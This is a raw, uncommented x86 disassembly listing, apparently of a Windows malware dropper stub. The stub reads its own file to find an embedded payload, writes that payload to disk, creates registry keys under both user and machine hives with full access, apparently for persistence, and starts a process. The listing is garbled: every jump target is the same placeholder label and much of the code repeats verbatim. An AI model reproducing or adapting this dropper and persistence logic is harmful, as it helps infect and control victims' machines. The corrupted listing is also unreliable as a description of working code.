pop [ ebp - 0x12c ]
mov eax [ ebp - 0x12c ]
sub eax 0x24c
mov [ ebp - 0x284 ] eax
mov [ ebp - 0x540 ] 0x0
mov [ ebp - 0x2a8 ] 0x0
mov [ ebp - 0x420 ] 0x0
mov [ ebp - 0x144 ] 0x0
mov ecx [ ebp - 0x284 ]
mov edx [ ecx ]
mov [ ebp - 0x420 ] edx
mov eax [ ebp - 0x284 ]
add eax 0x4
mov [ ebp - 0x140 ] eax
mov ecx [ ebp - 0x140 ]
push ecx
call sub_45be90
add esp 0x4
call sub_45c050
mov [ ebp - 0x54c ] eax
mov edx [ ebp - 0x140 ]
push edx
mov eax [ ebp - 0x54c ]
push eax
call sub_45c080
add esp 0x8
mov [ ebp - 0x540 ] eax
mov ecx [ ebp - 0x284 ]
mov edx [ ecx + 0x1c ]
mov [ ebp - 0x144 ] edx
mov [ ebp - 0x548 ] 0x0
mov [ ebp - 0x53c ] 0x0
mov eax [ ebp - 0x284 ]
add eax 0xa0
mov [ ebp - 0x2a4 ] eax
mov ecx [ ebp - 0x284 ]
add ecx 0x1f0
mov [ ebp - 0x14 ] ecx
mov edx [ ebp - 0x284 ]
add edx 0xd0
mov [ ebp - 0x128 ] edx
mov [ ebp - 0x124 ] 0x0
mov [ ebp - 0x150 ] 0x0
mov eax [ ebp - 0x12c ]
sub eax 0x1
mov [ ebp - 0x12c ] eax
mov ecx [ ebp - 0x12c ]
mov edx [ ecx ]
mov [ ebp - 0x154 ] edx
jmp rwxdata
mov [ ebp - 0x2a0 ] 0x0
mov [ ebp - 0x41c ] 0x0
mov [ ebp - 0x418 ] 0x0
mov [ ebp - 0x13c ] 0x0
mov [ ebp - 0x14c ] 0x0
mov [ ebp - 0x29c ] 0x0
mov [ ebp - 0x538 ] 0x0
mov [ ebp - 0x544 ] 0x0
mov [ ebp - 0x280 ] 0x0
mov [ ebp - 0x28c ] 0x0
mov [ ebp - 0x55c ] 0x0
mov [ ebp - 0x8 ] 0x0
mov [ ebp - 0x4 ] 0x0
mov [ ebp - 0x534 ] 0x0
mov [ ebp - 0x268 ] 0x0
mov [ ebp - 0x414 ] 0x0
mov [ ebp - 0x298 ] 0x0
mov edx [ ebp - 0x284 ]
add edx 0x1f0
mov [ ebp - 0x124 ] edx
mov eax [ ebp - 0x124 ]
mov ecx [ eax ]
mov [ ebp - 0x2a0 ] ecx
mov edx [ ebp - 0x124 ]
mov eax [ edx + 0x4 ]
mov [ ebp - 0x41c ] eax
mov ecx [ ebp - 0x124 ]
mov edx [ ecx + 0x8 ]
mov [ ebp - 0x418 ] edx
mov eax [ ebp - 0x124 ]
mov ecx [ eax + 0xc ]
mov [ ebp - 0x13c ] ecx
mov edx [ ebp - 0x124 ]
mov eax [ edx + 0x10 ]
mov [ ebp - 0x14c ] eax
mov ecx [ ebp - 0x124 ]
mov edx [ ecx + 0x14 ]
mov [ ebp - 0x29c ] edx
mov eax [ ebp - 0x124 ]
mov ecx [ eax + 0x18 ]
mov [ ebp - 0x538 ] ecx
mov edx [ ebp - 0x124 ]
mov eax [ edx + 0x1c ]
mov [ ebp - 0x544 ] eax
mov ecx [ ebp - 0x124 ]
mov edx [ ecx + 0x20 ]
mov [ ebp - 0x280 ] edx
mov eax [ ebp - 0x124 ]
mov ecx [ eax + 0x24 ]
mov [ ebp - 0x28c ] ecx
mov edx [ ebp - 0x124 ]
mov eax [ edx + 0x28 ]
mov [ ebp - 0x55c ] eax
mov ecx [ ebp - 0x124 ]
mov edx [ ecx + 0x2c ]
mov [ ebp - 0x8 ] edx
mov eax [ ebp - 0x124 ]
mov ecx [ eax + 0x30 ]
mov [ ebp - 0x4 ] ecx
mov edx [ ebp - 0x124 ]
mov eax [ edx + 0x34 ]
mov [ ebp - 0x534 ] eax
mov ecx [ ebp - 0x124 ]
mov edx [ ecx + 0x38 ]
mov [ ebp - 0x268 ] edx
mov eax [ ebp - 0x124 ]
mov ecx [ eax + 0x3c ]
mov [ ebp - 0x414 ] ecx
mov edx [ ebp - 0x124 ]
mov eax [ edx + 0x40 ]
mov [ ebp - 0x298 ] eax
mov [ ebp - 0x264 ] 0x0
mov ecx [ ebp - 0x284 ]
add ecx 0x20
mov [ ebp - 0x264 ] ecx
mov [ ebp - 0x2b4 ] 0x0
mov [ ebp - 0x18 ] 0x0
push 0x103
lea edx [ ebp - 0x120 ]
push edx
push 0x0
call [ ebp - 0x41c ]
push 0x0
push 0x0
push 0x3
push 0x0
push 0x1
push 0x80000000
lea eax [ ebp - 0x120 ]
push eax
call [ ebp - 0x418 ]
mov [ ebp - 0xc ] eax
cmp [ ebp - 0xc ] 0xffffffff
je rwxdata
mov eax [ ebp - 0x548 ]
push eax
call [ ebp - 0x540 ]
mov [ ebp - 0x150 ] eax
cmp [ ebp - 0x150 ] 0x0
jne rwxdata
cmp [ ebp - 0x154 ] 0x652a5e26
je rwxdata
call [ ebp - 0x420 ]
xor eax eax
mov esp ebp
pop ebp
retn
push 0x0
mov ecx [ ebp - 0xc ]
push ecx
call [ ebp - 0x14c ]
mov [ ebp - 0x288 ] eax
cmp [ ebp - 0x288 ] 0xc800000
ja rwxdata
mov ecx [ ebp - 0x128 ]
mov [ ebp - 0x53c ] ecx
mov edx [ ebp - 0x53c ]
movsx eax [ edx ]
test eax eax
je rwxdata
jmp rwxdata
mov ecx [ ebp - 0xc ]
push ecx
call [ ebp - 0x13c ]
push 0x4
push 0x1000
mov edx [ ebp - 0x288 ]
push edx
push 0x0
call [ ebp - 0x29c ]
mov [ ebp - 0x294 ] eax
cmp [ ebp - 0x294 ] 0x0
je rwxdata
mov edx [ ebp - 0x128 ]
add edx 0x5
mov [ ebp - 0x128 ] edx
mov eax [ ebp - 0x548 ]
mov [ ebp - 0x570 ] eax
mov [ ebp - 0x56c ] 0x0
mov ecx [ ebp - 0x53c ]
push ecx
mov edx [ ebp - 0x150 ]
push edx
call sub_45c080
add esp 0x8
mov [ ebp - 0x124 ] eax
mov [ ebp - 0x560 ] 0x4
push 0x0
lea eax [ ebp - 0x550 ]
push eax
mov ecx [ ebp - 0x288 ]
push ecx
mov edx [ ebp - 0x294 ]
push edx
mov eax [ ebp - 0xc ]
push eax
call [ ebp - 0x544 ]
mov ecx [ ebp - 0x550 ]
mov edx [ ebp - 0x294 ]
lea eax [ edx + ecx - 0x3 ]
mov [ ebp - 0x148 ] eax
jmp rwxdata
mov edx [ ebp - 0x56c ]
mov eax [ ebp - 0x2a4 ]
lea ecx [ eax + edx + 0x1 ]
mov [ ebp - 0x2a4 ] ecx
jmp rwxdata
mov ecx [ ebp - 0x570 ]
movsx edx [ ecx ]
mov eax [ ebp - 0x570 ]
add eax 0x1
mov [ ebp - 0x570 ] eax
test edx edx
je rwxdata
mov edx [ ebp - 0x14 ]
add edx 0x4
mov [ ebp - 0x14 ] edx
mov eax [ ebp - 0x53c ]
mov [ ebp - 0x568 ] eax
mov [ ebp - 0x564 ] 0x0
mov edx [ ebp - 0x14 ]
add edx [ ebp - 0x560 ]
mov eax [ ebp - 0x560 ]
mov cl [ ebp + eax - 0x124 ]
mov [ edx ] cl
jmp rwxdata
mov edx [ ebp - 0x148 ]
cmp edx [ ebp - 0x294 ]
jbe rwxdata
mov eax [ ebp - 0x2a4 ]
mov [ ebp - 0x548 ] eax
mov ecx [ ebp - 0x548 ]
movsx edx [ ecx ]
test edx edx
je rwxdata
mov ecx [ ebp - 0x56c ]
add ecx 0x1
mov [ ebp - 0x56c ] ecx
jmp rwxdata
mov edx [ ebp - 0x564 ]
mov eax [ ebp - 0x128 ]
lea ecx [ eax + edx + 0x1 ]
mov [ ebp - 0x128 ] ecx
jmp rwxdata
mov ecx [ ebp - 0x568 ]
movsx edx [ ecx ]
mov eax [ ebp - 0x568 ]
add eax 0x1
mov [ ebp - 0x568 ] eax
test edx edx
je rwxdata
mov eax [ ebp - 0x560 ]
mov ecx [ ebp - 0x560 ]
sub ecx 0x1
mov [ ebp - 0x560 ] ecx
test eax eax
je rwxdata
mov eax [ ebp - 0x148 ]
cmp eax [ ebp - 0x294 ]
jbe rwxdata
mov eax [ ebp - 0x148 ]
movsx ecx [ eax ]
cmp ecx 0x36
jne rwxdata
cmp [ ebp - 0x570 ] 0x0
je rwxdata
mov ecx [ ebp - 0x564 ]
add ecx 0x1
mov [ ebp - 0x564 ] ecx
jmp rwxdata
push 0x8000
push 0x0
mov eax [ ebp - 0x294 ]
push eax
call [ ebp - 0x538 ]
mov ecx [ ebp - 0x148 ]
add ecx 0x4
mov [ ebp - 0x148 ] ecx
mov [ ebp - 0x130 ] 0x0
jmp rwxdata
jmp rwxdata
mov edx [ ebp - 0x148 ]
movsx eax [ edx + 0x1 ]
cmp eax 0x2a
jne rwxdata
cmp [ ebp - 0x568 ] 0x0
je rwxdata
mov ecx [ ebp - 0x148 ]
movsx edx [ ecx ]
cmp edx 0x3a
je rwxdata
mov ecx [ ebp - 0x148 ]
sub ecx 0x1
mov [ ebp - 0x148 ] ecx
mov ecx [ ebp - 0x148 ]
movsx edx [ ecx + 0x2 ]
cmp edx 0x23
jne rwxdata
mov edx [ ebp - 0x130 ]
sub edx 0x1
mov [ ebp - 0x554 ] edx
jmp rwxdata
mov eax [ ebp - 0x130 ]
mov ecx [ ebp - 0x148 ]
mov dl [ ecx ]
mov [ ebp + eax - 0x120 ] dl
mov eax [ ebp - 0x148 ]
movsx ecx [ eax ]
cmp ecx 0x2e
jne rwxdata
jmp rwxdata
mov ecx [ ebp - 0x554 ]
movsx edx [ ebp + ecx - 0x120 ]
cmp edx 0x2e
je rwxdata
jmp rwxdata
mov [ ebp - 0x554 ] 0x0
jmp rwxdata
mov [ ebp - 0x2b0 ] 0x0
mov eax [ ebp - 0x554 ]
add eax 0x1
mov [ ebp - 0x554 ] eax
jmp rwxdata
jmp rwxdata
mov edx [ ebp - 0x130 ]
add edx 0x1
mov [ ebp - 0x130 ] edx
mov eax [ ebp - 0x148 ]
add eax 0x1
mov [ ebp - 0x148 ] eax
mov eax [ ebp - 0x554 ]
cmp eax [ ebp - 0x130 ]
jae rwxdata
mov eax [ ebp - 0x554 ]
cmp eax [ ebp - 0x130 ]
jae rwxdata
mov eax [ ebp - 0x554 ]
sub eax 0x1
mov [ ebp - 0x554 ] eax
mov ecx [ ebp - 0x554 ]
mov [ ebp + ecx - 0x260 ] 0x0
lea edx [ ebp - 0x260 ]
push edx
call sub_45be90
add esp 0x4
push 0x104
lea eax [ ebp - 0x260 ]
push eax
call [ ebp - 0x8 ]
push 0x0
lea ecx [ ebp - 0x260 ]
push ecx
call [ ebp - 0x280 ]
mov ecx [ ebp - 0x554 ]
mov edx [ ebp - 0x554 ]
mov al [ ebp + edx - 0x120 ]
mov [ ebp + ecx - 0x260 ] al
jmp rwxdata
mov ecx [ ebp - 0x2b0 ]
mov [ ebp + ecx - 0x260 ] 0x0
mov edx [ ebp - 0x130 ]
mov [ ebp + edx - 0x120 ] 0x0
lea eax [ ebp - 0x120 ]
push eax
call sub_45be90
add esp 0x4
lea ecx [ ebp - 0x260 ]
push ecx
call sub_45be90
add esp 0x4
push 0x104
lea edx [ ebp - 0x120 ]
push edx
call [ ebp - 0x8 ]
mov eax [ ebp - 0x148 ]
add eax 0x1
mov [ ebp - 0x148 ] eax
mov [ ebp - 0x130 ] 0x0
jmp rwxdata
mov ecx [ ebp - 0x2b0 ]
mov edx [ ebp - 0x554 ]
mov al [ ebp + edx - 0x120 ]
mov [ ebp + ecx - 0x260 ] al
jmp rwxdata
mov edx [ ebp - 0x554 ]
add edx 0x1
mov [ ebp - 0x554 ] edx
mov edx [ ebp - 0x130 ]
movsx eax [ ebp + edx - 0x120 ]
test eax eax
je rwxdata
mov ecx [ ebp - 0x554 ]
add ecx 0x1
mov [ ebp - 0x554 ] ecx
mov edx [ ebp - 0x2b0 ]
add edx 0x1
mov [ ebp - 0x2b0 ] edx
mov ecx [ ebp - 0x130 ]
mov [ ebp + ecx - 0x530 ] 0x20
mov edx [ ebp - 0x130 ]
add edx 0x1
mov [ ebp - 0x130 ] edx
mov eax [ ebp - 0x130 ]
mov [ ebp + eax - 0x530 ] 0x2f
mov ecx [ ebp - 0x130 ]
add ecx 0x1
mov [ ebp - 0x130 ] ecx
mov [ ebp - 0x290 ] 0x0
jmp rwxdata
mov ecx [ ebp - 0x130 ]
mov edx [ ebp - 0x130 ]
mov al [ ebp + edx - 0x120 ]
mov [ ebp + ecx - 0x530 ] al
jmp rwxdata
mov eax [ ebp - 0x148 ]
movsx ecx [ eax ]
cmp ecx 0x26
je rwxdata
mov ecx [ ebp - 0x130 ]
add ecx 0x1
mov [ ebp - 0x130 ] ecx
mov ecx [ ebp - 0x130 ]
mov [ ebp + ecx - 0x530 ] 0x0
mov edx [ ebp - 0x148 ]
add edx 0x1
mov [ ebp - 0x148 ] edx
mov eax [ ebp - 0x264 ]
push eax
call sub_45be90
add esp 0x4
mov ecx [ ebp - 0x144 ]
and ecx 0x1
je rwxdata
mov edx [ ebp - 0x290 ]
imul edx edx 0xa
mov eax [ ebp - 0x148 ]
movsx ecx [ eax ]
lea edx [ edx + ecx - 0x30 ]
mov [ ebp - 0x290 ] edx
mov eax [ ebp - 0x130 ]
mov ecx [ ebp - 0x148 ]
mov dl [ ecx ]
mov [ ebp + eax - 0x530 ] dl
mov eax [ ebp - 0x130 ]
add eax 0x1
mov [ ebp - 0x130 ] eax
jmp rwxdata
push 0x0
push 0x80
push 0x2
push 0x0
push 0x1
push 0x40000000
lea eax [ ebp - 0x120 ]
push eax
call [ ebp - 0x418 ]
mov [ ebp - 0x558 ] eax
cmp [ ebp - 0x558 ] 0xffffffff
je rwxdata
mov edx [ ebp - 0x144 ]
and edx 0x10
je rwxdata
mov edx [ ebp - 0x148 ]
add edx 0x1
mov [ ebp - 0x148 ] edx
push 0x37b18
mov ecx [ ebp - 0x148 ]
push ecx
call sub_45bfc0
add esp 0x8
push 0x0
lea edx [ ebp - 0x550 ]
push edx
push 0x37b18
mov eax [ ebp - 0x148 ]
push eax
mov ecx [ ebp - 0x558 ]
push ecx
call [ ebp - 0x28c ]
mov edx [ ebp - 0x558 ]
push edx
call [ ebp - 0x13c ]
mov eax [ ebp - 0x144 ]
and eax 0x100
je rwxdata
lea eax [ ebp - 0x27c ]
push eax
lea ecx [ ebp - 0x138 ]
push ecx
push 0x0
push 0xf003f
push 0x0
push 0x0
push 0x0
mov edx [ ebp - 0x264 ]
push edx
push 0x80000001
call [ ebp - 0x4 ]
mov [ ebp - 0x2b4 ] eax
lea eax [ ebp - 0x27c ]
push eax
lea ecx [ ebp - 0x138 ]
push ecx
push 0x0
push 0xf003f
push 0x0
push 0x0
push 0x0
mov edx [ ebp - 0x264 ]
push edx
push 0x80000002
call [ ebp - 0x4 ]
mov [ ebp - 0x2b4 ] eax
jmp rwxdata
mov [ ebp - 0x574 ] 0x44
mov [ ebp - 0x130 ] 0x0
jmp rwxdata
cmp [ ebp - 0x2b4 ] 0x0
jne rwxdata
mov [ ebp - 0x300 ] 0x44
mov [ ebp - 0x2d4 ] 0x81
mov eax [ ebp - 0x144 ]
and eax 0x1000
je rwxdata
mov ecx [ ebp - 0x574 ]
sub ecx 0x1
mov [ ebp - 0x574 ] ecx
mov edx [ ebp - 0x574 ]
mov [ ebp + edx - 0x300 ] 0x0
jmp rwxdata
cmp [ ebp - 0x130 ] 0xa
jae rwxdata
mov edx 0x5
mov [ ebp - 0x2d0 ] dx
xor ecx ecx
mov [ ebp - 0x2d0 ] cx
jmp rwxdata
cmp [ ebp - 0x574 ] 0x0
je rwxdata
cmp [ ebp - 0x2b4 ] 0x0
jne rwxdata
lea ecx [ ebp - 0x134 ]
push ecx
lea edx [ ebp - 0x410 ]
push edx
lea eax [ ebp - 0x10 ]
push eax
push 0x0
lea ecx [ ebp - 0x260 ]
push ecx
mov edx [ ebp - 0x138 ]
push edx
call [ ebp - 0x414 ]
mov [ ebp - 0x2b4 ] eax
cmp [ ebp - 0x2b4 ] 0x0
jne rwxdata
lea eax [ ebp - 0x278 ]
push eax
lea ecx [ ebp - 0x300 ]
push ecx
push 0x0
push 0x0
push 0x20
push 0x0
push 0x0
push 0x0
lea edx [ ebp - 0x120 ]
push edx
push 0x0
call [ ebp - 0x55c ]
mov [ ebp - 0x2ac ] 0x0
jmp rwxdata
mov [ ebp - 0x130 ] 0x0
jmp rwxdata
jmp rwxdata
jmp rwxdata
mov ecx [ ebp - 0x2ac ]
movsx edx [ ebp + ecx - 0x530 ]
test edx edx
je rwxdata
mov ecx [ ebp - 0x130 ]
movsx edx [ ebp + ecx - 0x410 ]
cmp edx 0x2f
je rwxdata
mov eax [ ebp - 0x130 ]
add eax 0x1
mov [ ebp - 0x130 ] eax
mov eax [ ebp - 0x18 ]
cmp eax [ ebp - 0x290 ]
jae rwxdata
jmp rwxdata
mov edx [ ebp - 0x130 ]
movsx eax [ ebp + edx - 0x410 ]
cmp eax 0x2f
jne rwxdata
mov eax [ ebp - 0x130 ]
movsx ecx [ ebp + eax - 0x410 ]
test ecx ecx
je rwxdata
mov edx [ ebp - 0x138 ]
push edx
call [ ebp - 0x534 ]
mov ecx [ ebp - 0x2ac ]
push ecx
lea edx [ ebp - 0x530 ]
push edx
push 0x1
push 0x0
lea eax [ ebp - 0x260 ]
push eax
mov ecx [ ebp - 0x138 ]
push ecx
call [ ebp - 0x268 ]
mov [ ebp - 0x2b4 ] eax
mov eax [ ebp - 0x2ac ]
add eax 0x1
mov [ ebp - 0x2ac ] eax
mov ecx [ ebp - 0x130 ]
add ecx 0x1
mov [ ebp - 0x130 ] ecx
jmp rwxdata
jmp rwxdata
mov eax [ ebp - 0x130 ]
movsx ecx [ ebp + eax - 0x410 ]
test ecx ecx
je rwxdata
mov eax [ ebp - 0x130 ]
add eax 0x1
mov [ ebp - 0x130 ] eax
mov edx [ ebp - 0x18 ]
imul edx edx 0xa
mov eax [ ebp - 0x130 ]
movsx ecx [ ebp + eax - 0x410 ]
lea edx [ edx + ecx - 0x30 ]
mov [ ebp - 0x18 ] edx
jmp rwxdata
mov edx [ ebp - 0x130 ]
add edx 0x1
mov [ ebp - 0x130 ] edx
sub_45b27d
nop
pop [ ebp - 0x12c ]
mov eax [ ebp - 0x12c ]
sub eax 0x24c
mov [ ebp - 0x284 ] eax
mov [ ebp - 0x540 ] 0x0
mov [ ebp - 0x2a8 ] 0x0
mov [ ebp - 0x420 ] 0x0
mov [ ebp - 0x144 ] 0x0
mov ecx [ ebp - 0x284 ]
mov edx [ ecx ]
mov [ ebp - 0x420 ] edx
mov eax [ ebp - 0x284 ]
add eax 0x4
mov [ ebp - 0x140 ] eax
mov ecx [ ebp - 0x140 ]
push ecx
call sub_45be90
add esp 0x4
call sub_45c050
mov [ ebp - 0x54c ] eax
mov edx [ ebp - 0x140 ]
push edx
mov eax [ ebp - 0x54c ]
push eax
call sub_45c080
add esp 0x8
mov [ ebp - 0x540 ] eax
mov ecx [ ebp - 0x284 ]
mov edx [ ecx + 0x1c ]
mov [ ebp - 0x144 ] edx
mov [ ebp - 0x548 ] 0x0
mov [ ebp - 0x53c ] 0x0
mov eax [ ebp - 0x284 ]
add eax 0xa0
mov [ ebp - 0x2a4 ] eax
mov ecx [ ebp - 0x284 ]
add ecx 0x1f0
mov [ ebp - 0x14 ] ecx
mov edx [ ebp - 0x284 ]
add edx 0xd0
mov [ ebp - 0x128 ] edx
mov [ ebp - 0x124 ] 0x0
mov [ ebp - 0x150 ] 0x0
mov eax [ ebp - 0x12c ]
sub eax 0x1
mov [ ebp - 0x12c ] eax
mov ecx [ ebp - 0x12c ]
mov edx [ ecx ]
mov [ ebp - 0x154 ] edx
jmp rwxdata
mov [ ebp - 0x2a0 ] 0x0
mov [ ebp - 0x41c ] 0x0
mov [ ebp - 0x418 ] 0x0
mov [ ebp - 0x13c ] 0x0
mov [ ebp - 0x14c ] 0x0
mov [ ebp - 0x29c ] 0x0
mov [ ebp - 0x538 ] 0x0
mov [ ebp - 0x544 ] 0x0
mov [ ebp - 0x280 ] 0x0
mov [ ebp - 0x28c ] 0x0
mov [ ebp - 0x55c ] 0x0
mov [ ebp - 0x8 ] 0x0
mov [ ebp - 0x4 ] 0x0
mov [ ebp - 0x534 ] 0x0
mov [ ebp - 0x268 ] 0x0
mov [ ebp - 0x414 ] 0x0
mov [ ebp - 0x298 ] 0x0
mov edx [ ebp - 0x284 ]
add edx 0x1f0
mov [ ebp - 0x124 ] edx
mov eax [ ebp - 0x124 ]
mov ecx [ eax ]
mov [ ebp - 0x2a0 ] ecx
mov edx [ ebp - 0x124 ]
mov eax [ edx + 0x4 ]
mov [ ebp - 0x41c ] eax
mov ecx [ ebp - 0x124 ]
mov edx [ ecx + 0x8 ]
mov [ ebp - 0x418 ] edx
mov eax [ ebp - 0x124 ]
mov ecx [ eax + 0xc ]
mov [ ebp - 0x13c ] ecx
mov edx [ ebp - 0x124 ]
mov eax [ edx + 0x10 ]
mov [ ebp - 0x14c ] eax
mov ecx [ ebp - 0x124 ]
mov edx [ ecx + 0x14 ]
mov [ ebp - 0x29c ] edx
mov eax [ ebp - 0x124 ]
mov ecx [ eax + 0x18 ]
mov [ ebp - 0x538 ] ecx
mov edx [ ebp - 0x124 ]
mov eax [ edx + 0x1c ]
mov [ ebp - 0x544 ] eax
mov ecx [ ebp - 0x124 ]
mov edx [ ecx + 0x20 ]
mov [ ebp - 0x280 ] edx
mov eax [ ebp - 0x124 ]
mov ecx [ eax + 0x24 ]
mov [ ebp - 0x28c ] ecx
mov edx [ ebp - 0x124 ]
mov eax [ edx + 0x28 ]
mov [ ebp - 0x55c ] eax
mov ecx [ ebp - 0x124 ]
mov edx [ ecx + 0x2c ]
mov [ ebp - 0x8 ] edx
mov eax [ ebp - 0x124 ]
mov ecx [ eax + 0x30 ]
mov [ ebp - 0x4 ] ecx
mov edx [ ebp - 0x124 ]
mov eax [ edx + 0x34 ]
mov [ ebp - 0x534 ] eax
mov ecx [ ebp - 0x124 ]
mov edx [ ecx + 0x38 ]
mov [ ebp - 0x268 ] edx
mov eax [ ebp - 0x124 ]
mov ecx [ eax + 0x3c ]
mov [ ebp - 0x414 ] ecx
mov edx [ ebp - 0x124 ]
mov eax [ edx + 0x40 ]
mov [ ebp - 0x298 ] eax
mov [ ebp - 0x264 ] 0x0
mov ecx [ ebp - 0x284 ]
add ecx 0x20
mov [ ebp - 0x264 ] ecx
mov [ ebp - 0x2b4 ] 0x0
mov [ ebp - 0x18 ] 0x0
push 0x103
lea edx [ ebp - 0x120 ]
push edx
push 0x0
call [ ebp - 0x41c ]
push 0x0
push 0x0
push 0x3
push 0x0
push 0x1
push 0x80000000
lea eax [ ebp - 0x120 ]
push eax
call [ ebp - 0x418 ]
mov [ ebp - 0xc ] eax
cmp [ ebp - 0xc ] 0xffffffff
je rwxdata
mov eax [ ebp - 0x548 ]
push eax
call [ ebp - 0x540 ]
mov [ ebp - 0x150 ] eax
cmp [ ebp - 0x150 ] 0x0
jne rwxdata
cmp [ ebp - 0x154 ] 0x652a5e26
je rwxdata
call [ ebp - 0x420 ]
xor eax eax
mov esp ebp
pop ebp
retn
push 0x0
mov ecx [ ebp - 0xc ]
push ecx
call [ ebp - 0x14c ]
mov [ ebp - 0x288 ] eax
cmp [ ebp - 0x288 ] 0xc800000
ja rwxdata
mov ecx [ ebp - 0x128 ]
mov [ ebp - 0x53c ] ecx
mov edx [ ebp - 0x53c ]
movsx eax [ edx ]
test eax eax
je rwxdata
jmp rwxdata
mov ecx [ ebp - 0xc ]
push ecx
call [ ebp - 0x13c ]
push 0x4
push 0x1000
mov edx [ ebp - 0x288 ]
push edx
push 0x0
call [ ebp - 0x29c ]
mov [ ebp - 0x294 ] eax
cmp [ ebp - 0x294 ] 0x0
je rwxdata
mov edx [ ebp - 0x128 ]
add edx 0x5
mov [ ebp - 0x128 ] edx
mov eax [ ebp - 0x548 ]
mov [ ebp - 0x570 ] eax
mov [ ebp - 0x56c ] 0x0
mov ecx [ ebp - 0x53c ]
push ecx
mov edx [ ebp - 0x150 ]
push edx
call sub_45c080
add esp 0x8
mov [ ebp - 0x124 ] eax
mov [ ebp - 0x560 ] 0x4
push 0x0
lea eax [ ebp - 0x550 ]
push eax
mov ecx [ ebp - 0x288 ]
push ecx
mov edx [ ebp - 0x294 ]
push edx
mov eax [ ebp - 0xc ]
push eax
call [ ebp - 0x544 ]
mov ecx [ ebp - 0x550 ]
mov edx [ ebp - 0x294 ]
lea eax [ edx + ecx - 0x3 ]
mov [ ebp - 0x148 ] eax
jmp rwxdata
mov edx [ ebp - 0x56c ]
mov eax [ ebp - 0x2a4 ]
lea ecx [ eax + edx + 0x1 ]
mov [ ebp - 0x2a4 ] ecx
jmp rwxdata
mov ecx [ ebp - 0x570 ]
movsx edx [ ecx ]
mov eax [ ebp - 0x570 ]
add eax 0x1
mov [ ebp - 0x570 ] eax
test edx edx
je rwxdata
mov edx [ ebp - 0x14 ]
add edx 0x4
mov [ ebp - 0x14 ] edx
mov eax [ ebp - 0x53c ]
mov [ ebp - 0x568 ] eax
mov [ ebp - 0x564 ] 0x0
mov edx [ ebp - 0x14 ]
add edx [ ebp - 0x560 ]
mov eax [ ebp - 0x560 ]
mov cl [ ebp + eax - 0x124 ]
mov [ edx ] cl
jmp rwxdata
mov edx [ ebp - 0x148 ]
cmp edx [ ebp - 0x294 ]
jbe rwxdata
mov eax [ ebp - 0x2a4 ]
mov [ ebp - 0x548 ] eax
mov ecx [ ebp - 0x548 ]
movsx edx [ ecx ]
test edx edx
je rwxdata
mov ecx [ ebp - 0x56c ]
add ecx 0x1
mov [ ebp - 0x56c ] ecx
jmp rwxdata
mov edx [ ebp - 0x564 ]
mov eax [ ebp - 0x128 ]
lea ecx [ eax + edx + 0x1 ]
mov [ ebp - 0x128 ] ecx
jmp rwxdata
mov ecx [ ebp - 0x568 ]
movsx edx [ ecx ]
mov eax [ ebp - 0x568 ]
add eax 0x1
mov [ ebp - 0x568 ] eax
test edx edx
je rwxdata
mov eax [ ebp - 0x560 ]
mov ecx [ ebp - 0x560 ]
sub ecx 0x1
mov [ ebp - 0x560 ] ecx
test eax eax
je rwxdata
mov eax [ ebp - 0x148 ]
cmp eax [ ebp - 0x294 ]
jbe rwxdata
mov eax [ ebp - 0x148 ]
movsx ecx [ eax ]
cmp ecx 0x36
jne rwxdata
cmp [ ebp - 0x570 ] 0x0
je rwxdata
mov ecx [ ebp - 0x564 ]
add ecx 0x1
mov [ ebp - 0x564 ] ecx
jmp rwxdata
push 0x8000
push 0x0
mov eax [ ebp - 0x294 ]
push eax
call [ ebp - 0x538 ]
mov ecx [ ebp - 0x148 ]
add ecx 0x4
mov [ ebp - 0x148 ] ecx
mov [ ebp - 0x130 ] 0x0
jmp rwxdata
jmp rwxdata
mov edx [ ebp - 0x148 ]
movsx eax [ edx + 0x1 ]
cmp eax 0x2a
jne rwxdata
cmp [ ebp - 0x568 ] 0x0
je rwxdata
mov ecx [ ebp - 0x148 ]
movsx edx [ ecx ]
cmp edx 0x3a
je rwxdata
mov ecx [ ebp - 0x148 ]
sub ecx 0x1
mov [ ebp - 0x148 ] ecx
mov ecx [ ebp - 0x148 ]
movsx edx [ ecx + 0x2 ]
cmp edx 0x23
jne rwxdata
mov edx [ ebp - 0x130 ]
sub edx 0x1
mov [ ebp - 0x554 ] edx
jmp rwxdata
mov eax [ ebp - 0x130 ]
mov ecx [ ebp - 0x148 ]
mov dl [ ecx ]
mov [ ebp + eax - 0x120 ] dl
mov eax [ ebp - 0x148 ]
movsx ecx [ eax ]
cmp ecx 0x2e
jne rwxdata
jmp rwxdata
mov ecx [ ebp - 0x554 ]
movsx edx [ ebp + ecx - 0x120 ]
cmp edx 0x2e
je rwxdata
jmp rwxdata
mov [ ebp - 0x554 ] 0x0
jmp rwxdata
mov [ ebp - 0x2b0 ] 0x0
mov eax [ ebp - 0x554 ]
add eax 0x1
mov [ ebp - 0x554 ] eax
jmp rwxdata
jmp rwxdata
mov edx [ ebp - 0x130 ]
add edx 0x1
mov [ ebp - 0x130 ] edx
mov eax [ ebp - 0x148 ]
add eax 0x1
mov [ ebp - 0x148 ] eax
mov eax [ ebp - 0x554 ]
cmp eax [ ebp - 0x130 ]
jae rwxdata
mov eax [ ebp - 0x554 ]
cmp eax [ ebp - 0x130 ]
jae rwxdata
mov eax [ ebp - 0x554 ]
sub eax 0x1
mov [ ebp - 0x554 ] eax
mov ecx [ ebp - 0x554 ]
mov [ ebp + ecx - 0x260 ] 0x0
lea edx [ ebp - 0x260 ]
push edx
call sub_45be90
add esp 0x4
push 0x104
lea eax [ ebp - 0x260 ]
push eax
call [ ebp - 0x8 ]
push 0x0
lea ecx [ ebp - 0x260 ]
push ecx
call [ ebp - 0x280 ]
mov ecx [ ebp - 0x554 ]
mov edx [ ebp - 0x554 ]
mov al [ ebp + edx - 0x120 ]
mov [ ebp + ecx - 0x260 ] al
jmp rwxdata
mov ecx [ ebp - 0x2b0 ]
mov [ ebp + ecx - 0x260 ] 0x0
mov edx [ ebp - 0x130 ]
mov [ ebp + edx - 0x120 ] 0x0
lea eax [ ebp - 0x120 ]
push eax
call sub_45be90
add esp 0x4
lea ecx [ ebp - 0x260 ]
push ecx
call sub_45be90
add esp 0x4
push 0x104
lea edx [ ebp - 0x120 ]
push edx
call [ ebp - 0x8 ]
mov eax [ ebp - 0x148 ]
add eax 0x1
mov [ ebp - 0x148 ] eax
mov [ ebp - 0x130 ] 0x0
jmp rwxdata
mov ecx [ ebp - 0x2b0 ]
mov edx [ ebp - 0x554 ]
mov al [ ebp + edx - 0x120 ]
mov [ ebp + ecx - 0x260 ] al
jmp rwxdata
mov edx [ ebp - 0x554 ]
add edx 0x1
mov [ ebp - 0x554 ] edx
